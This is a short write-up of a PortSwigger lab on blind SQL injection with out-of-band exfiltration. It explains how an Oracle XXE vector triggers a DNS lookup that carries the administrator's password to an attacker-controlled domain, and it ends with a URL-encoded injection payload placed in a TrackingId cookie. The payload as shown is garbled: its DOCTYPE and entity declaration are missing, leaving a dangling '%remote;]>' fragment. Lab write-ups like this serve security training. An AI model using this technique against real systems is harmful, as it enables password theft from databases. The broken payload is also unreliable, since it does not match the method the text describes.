< Back





14. Blind SQL injection with out-of-band data exfiltration

This web application handles SQL queries asynchronously, making it difficult to detect the results
of a SQL injection attack. This includes trying to determine the type of SQL database in use. To
solve this, we eventually use the Oracle XXE vulnerability to trigger a DNS lookup. This lab
requires the use of PortSwigger's Burp Suite Professional distribution, however, in a real
engagement you could always create your own DNS server to capture the DNS lookup. We append the
password of the administrator as a subdomain to our domain that we're using to capture DNS requests,
allowing us to exfil the password. Here's the payload:


TrackingId=dtBu3jq1O29SviC6'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--